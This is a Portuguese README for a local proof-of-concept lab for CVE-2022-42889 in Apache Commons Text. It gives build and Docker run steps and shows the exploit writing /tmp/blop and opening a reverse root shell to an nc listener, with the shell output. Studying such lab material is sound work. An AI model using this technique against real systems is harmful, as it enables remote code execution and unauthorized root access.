
Uma aplicação simples que demonstra como explorar a vulnerabilidade CVE-2022-42889
Uma aplicação de demonstração simples que mostra como explorar a vulnerabilidade CVE-2022-42889.
Utiliza serviços OOB (Out of Band) para demonstrar os prefixos dns e url.
JavaDocs para interpolação commons-text commons-text JavaDocs
Exemplos de interpolações
Citação da Rapid7
A vulnerabilidade foi comparada ao Log4Shell por ser uma vulnerabilidade de nível de biblioteca de código aberto que provavelmente impactará uma ampla variedade de aplicações de software que utilizam o objeto relevante.
No entanto, a análise inicial indica que essa é uma comparação inadequada. A natureza da vulnerabilidade significa que, ao contrário do Log4Shell, será raro que uma aplicação utilize o componente vulnerável do Commons Text para processar entradas não confiáveis e potencialmente maliciosas.
Java e maven podem ser ignorados se for obtida a imagem do Docker Hub
Compilar a aplicação
mvn clean package
Compilar a imagem docker
docker build -t cve-2022-42889-poc .
Executar a imagem docker
docker run --rm -p 8081:8081 -t cve-2022-42889-poc
Acessar a aplicação e seguir as instruções
open http://localhost:8081
Verificar que a vulnerabilidade cria um novo ficheiro no diretório /tmp/ (/tmp/blop)
➜ ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp
blop tomcat-docbase.8081.12439436974042217796
hsperfdata_root tomcat.8081.2549096106233509364
➜ ~
Shell reverso. Lance o "nc" na sua máquina local
➜ ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

